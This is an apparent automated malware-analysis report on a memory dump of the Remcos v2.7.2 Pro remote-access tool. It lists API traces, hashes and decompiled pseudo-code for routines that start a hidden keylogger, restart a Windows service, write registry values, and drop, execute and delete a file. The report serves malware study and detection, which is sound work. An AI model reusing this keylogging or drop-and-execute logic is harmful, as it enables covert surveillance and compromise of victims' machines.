                                  • Instruction ID: a0367b72af85d797f208d99e464840de03d8dffdaa75739b080142e4d14956f2
                                  • Opcode Fuzzy Hash: f20ee38416db81f306279cb0c28f4eeb0498ba6ae41a5029cc8ee80026fbf496
                                  • Instruction Fuzzy Hash: 59210571640204EBC3019FA5FC5CAEE7BA5FB88391B01C5BAE915CA3B0D7B854858BDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F164
                                  • SetEvent.KERNEL32(?), ref: 0040F16D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F176
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040F18E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040F19E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F1AD
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1D4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040F1EA
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415774,?,?,?,?), ref: 0040EFD0
                                    • Part of subcall function 0040EFB5: getenv.MSVCRT ref: 0040EFDC
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040EFE8
                                    • Part of subcall function 0040EFB5: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040EFF5
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F000
                                    • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F009
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040F016
                                    • Part of subcall function 0040EFB5: ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040F023
                                    • Part of subcall function 0040EFB5: ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040F02F
                                    • Part of subcall function 0040EFB5: ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040F048
                                    • Part of subcall function 0040EFB5: ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F055
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F074
                                    • Part of subcall function 0040EFB5: ShellExecuteExA.SHELL32(0000003C), ref: 0040F091
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040F0B5
                                    • Part of subcall function 0040EFB5: WaitForSingleObject.KERNEL32(?,000000FF,00000070), ref: 0040F0C9
                                    • Part of subcall function 0040EFB5: CloseHandle.KERNEL32(?), ref: 0040F0D2
                                    • Part of subcall function 0040EFB5: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040F0DB
                                    • Part of subcall function 0040EFB5: DeleteFileA.KERNEL32(00000000), ref: 0040F0E2
                                    • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?), ref: 0040F0FC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F203
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F20C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: U?$char_traits@V?$allocator@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@D@1@@$?length@?$basic_string@D@std@@@std@@V12@V?$basic_string@$?substr@?$basic_string@D@2@@0@Hstd@@$??0?$basic_ofstream@??4?$basic_string@??6std@@?close@?$basic_ofstream@?find@?$basic_string@?is_open@?$basic_ofstream@CloseD@2@@0@@D@std@@@0@DeleteEventExecuteFileHandleObjectShellSingleV01@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                  • String ID:
                                  • API String ID: 3444260106-0
                                  • Opcode ID: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction ID: d3c5bc4c42892396de9c650a771481d552770ca9ad5ac93fd76f7ee9f08353b1
                                  • Opcode Fuzzy Hash: b6100d932f502accd6102e554d23c4b8925cd08d706260dfc719fbf2ac55668d
                                  • Instruction Fuzzy Hash: A1216D7291051DEBCF04FBA5DC5A9EE7778FF54344F004429E822A31A0EA745504CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E004117C7(void* _a4) {
                                  				intOrPtr _v28;
                                  				struct _SERVICE_STATUS _v32;
                                  				short* _t6;
                                  				signed int _t12;
                                  				int _t20;
                                  				void* _t23;
                                  				void* _t24;
                                  
                                  				_t20 = 0;
                                  				_t6 = OpenSCManagerW(0, 0, 0x11);
                                  				_t24 = _t6;
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t23 = OpenServiceW(_t24, _t6, 0xf003f);
                                  				if(_t23 != 0) {
                                  					if(ControlService(_t23, 1,  &_v32) != 0) {
                                  						do {
                                  							QueryServiceStatus(_t23,  &_v32);
                                  						} while (_v28 != 1);
                                  						_t12 = StartServiceW(_t23, 0, 0);
                                  						asm("sbb eax, eax");
                                  						_t20 = ( ~_t12 & 0x000000fe) + 3;
                                  					} else {
                                  						_t20 = 2;
                                  					}
                                  					CloseServiceHandle(_t24);
                                  					CloseServiceHandle(_t23);
                                  				} else {
                                  					CloseServiceHandle(_t24);
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t20;
                                  			}

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,0041B310,?,?,?,?,?,?,?,004110D1), ref: 004117D6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(000F003F,?,?,?,?,?,?,?,004110D1), ref: 004117E6
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004110D1), ref: 004117EE
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004110D1), ref: 004117FB
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,004110D1), ref: 0041180A
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411844
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00411847
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004110D1), ref: 0041184C
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                  • String ID:
                                  • API String ID: 858787766-0
                                  • Opcode ID: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction ID: 27ef0d8d6bf4ce4ef3b04b5e550ea63dbe34549437a8387cc222ba95df0e15bc
                                  • Opcode Fuzzy Hash: a490ed44b7af5fe9121cd1156266513f1612a8d37615e270cb9315c7a913b310
                                  • Instruction Fuzzy Hash: 0B01A172550518EFD7107FA0EC899FF3B6CEB9A7917408021FA02D2160DB648946DAE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E00413D3D(signed int __edx, intOrPtr _a4) {
                                  				void _v1003;
                                  				char _v1004;
                                  				struct HWND__* _t13;
                                  				signed int _t34;
                                  				signed int _t36;
                                  				unsigned int _t40;
                                  				signed int _t41;
                                  				signed int _t47;
                                  				signed int _t50;
                                  				signed int _t56;
                                  				signed int _t59;
                                  				signed int _t64;
                                  				signed int _t65;
                                  				void* _t91;
                                  				void* _t92;
                                  				void* _t93;
                                  
                                  				_t64 = __edx;
                                  				AllocConsole();
                                  				_t13 =  *0x41c1f8();
                                  				 *0x41c1fc = _t13;
                                  				if(_a4 == 0) {
                                  					ShowWindow(_t13, 0);
                                  				}
                                  				freopen("CONOUT$", "a", __imp___iob + 0x20);
                                  				_v1004 = 0;
                                  				memset( &_v1003, 0, 0xf9 << 2);
                                  				asm("stosw");
                                  				asm("stosb");
                                  				_t65 = _t64 | 0xffffffff;
                                  				asm("repne scasb");
                                  				_t40 =  !_t65;
                                  				_t91 = " * Remcos v" - _t40;
                                  				_t41 = _t40 >> 2;
                                  				memcpy(_t91 + _t41 + _t41, _t91, memcpy( &_v1004, _t91, _t41 << 2) & 0x00000003);
                                  				asm("repne scasb");
                                  				_t47 =  !_t65;
                                  				_t92 = "2.7.2 Pro" - _t47;
                                  				_t34 = _t47;
                                  				asm("repne scasb");
                                  				_t50 = _t34 >> 2;
                                  				memcpy( &_v1004 - 1, _t92, _t50 << 2);
                                  				memcpy(_t92 + _t50 + _t50, _t92, _t34 & 0x00000003);
                                  				asm("repne scasb");
                                  				_t56 =  !_t65;
                                  				_t93 = "\n * BreakingSecurity.Net\n\n" - _t56;
                                  				_t36 = _t56;
                                  				asm("repne scasb");
                                  				_t59 = _t36 >> 2;
                                  				memcpy( &_v1004 - 1, _t93, _t59 << 2);
                                  				memcpy(_t93 + _t59 + _t59, _t93, _t36 & 0x00000003);
                                  				return printf( &_v1004);
                                  			}


                                  APIs
                                  • AllocConsole.KERNEL32(73B743E0,0041BCB0,00000000), ref: 00413D49
                                  • ShowWindow.USER32(00000000,00000000), ref: 00413D63
                                  • freopen.MSVCRT ref: 00413D7C
                                  • printf.MSVCRT ref: 00413E25
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocConsoleShowWindowfreopenprintf
                                  • String ID: * BreakingSecurity.Net$ * Remcos v$2.7.2 Pro$CONOUT$
                                  • API String ID: 3419900118-1124569734
                                  • Opcode ID: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction ID: e9522ca3004100f4f480c0466296eb3066317ede3a0b8fd360cc0205dee7bfbf
                                  • Opcode Fuzzy Hash: b1b5080caeedf021356004c91e5e7e7175471eb2af215126cee024e722724922
                                  • Instruction Fuzzy Hash: DC213D36B406085BCB29DB7DDCD45EE7A97A7C4251B95827EF80BD73C0DEB08D488644
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 45%
                                  			E00405BC0(void* __ecx) {
                                  				char _v5;
                                  				char _v6;
                                  				void* _t8;
                                  				void* _t31;
                                  
                                  				_push(__ecx);
                                  				_t31 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 0x3d)) == 0) {
                                  					 *((char*)(__ecx + 0x3d)) = 1;
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v5);
                                  					E00405DD3(__ecx);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  					E0041203B("[INFO]",  &_v6, "Online Keylogger Started",  &_v5, "Online Keylogger Started");
                                  					if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
                                  						E00405156(_t31);
                                  						if( *_t31 == 0) {
                                  							CreateThread(0, 0, E0040526A, _t31, 0, 0);
                                  						}
                                  						CreateThread(0, 0, E00405299, _t31, 0, 0);
                                  					}
                                  					_t8 = CreateThread(0, 0, E004052A8, _t31, 0, 0);
                                  					 *(_t31 + 0x28) = _t8;
                                  				}
                                  				return _t8;
                                  			}

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,Online Keylogger Started,?), ref: 00405BE7
                                    • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                    • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                    • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                    • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                    • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                    • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                    • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                    • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                    • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                    • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                    • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Online Keylogger Started,?,?,?,Online Keylogger Started,?), ref: 00405BFE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405C12
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • CreateThread.KERNEL32(00000000,00000000,Function_000052A8,?,00000000,00000000), ref: 00405C58
                                    • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000526A,?,00000000,00000000), ref: 00405C40
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005299,?,00000000,00000000), ref: 00405C4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@CreateD@1@@ThreadV01@V10@$?c_str@?$basic_string@LocalTimeV10@@Y?$basic_string@$??4?$basic_string@?length@?$basic_string@EventKeyboardLayoutV01@@V10@0@freemallocprintfsprintf
                                  • String ID: Online Keylogger Started$[INFO]
                                  • API String ID: 3243250608-3343292223
                                  • Opcode ID: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                  • Instruction ID: c910a21b19b54318fc77c553f5add3804aa9723349d7e3508c4a5a722b276437
                                  • Opcode Fuzzy Hash: a8e662678da6ae76e9fc608fff52aafdf6fc640e70994fb474de8f560b873d38
                                  • Instruction Fuzzy Hash: 4011E5A0604B0CBFF71077768CC6CBF7A6CDE81698740047EF40262281DAB95C448EB9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 20%
                                  			E0040E254(void* __eax, void* __eflags) {
                                  				void* _t7;
                                  				void* _t9;
                                  				void* _t28;
                                  
                                  				_t33 = __eflags;
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t7 = E0040180C(_t28 - 0x10, __eflags, 0);
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				_t9 = E0040180C(_t28 - 0x10, _t33, 0);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				E0040B8F8(_t33, 0x80000001, _t9, "name", _t9, _t7 + 1, __eax, __eax, 3);
                                  				E004017DD(_t28 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}


                                  APIs
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040E25D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E266
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,00000000), ref: 0040E27A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000001), ref: 0040E28D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,00000000), ref: 0040E29E
                                    • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                    • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@$??0?$basic_string@?length@?$basic_string@?size@?$basic_string@V01@@
                                  • String ID: name
                                  • API String ID: 4248281052-1579384326
                                  • Opcode ID: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction ID: 9ee346064aa2c941639b0d7d09d57cd35de4d8052a4636764cc5c845d749206a
                                  • Opcode Fuzzy Hash: 83e4fc8ba24890861120159763b2a38f5dda00935ac70df88cfa2c43dd0e8913
                                  • Instruction Fuzzy Hash: 6DF01D72A00518DFDB05ABE1EC599FE7768EB94345B00843EE513A70E0EF780905CB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00411AF5(void* __ecx, WCHAR* _a4) {
                                  				char _v5;
                                  				char _v6;
                                  				void* _t13;
                                  
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(__ecx);
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				E0041203B("[ALARM]",  &_v6, "Alarm has been triggered!",  &_v5, _t13);
                                  				PlaySoundW(_a4, GetModuleHandleA(0), 0x20009);
                                  				Sleep(0x2710);
                                  				return PlaySoundW(0, 0, 0);
                                  			}


                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Alarm has been triggered!,?,?,?,00411AE8,00000000), ref: 00411B08
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ALARM],?), ref: 00411B1C
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
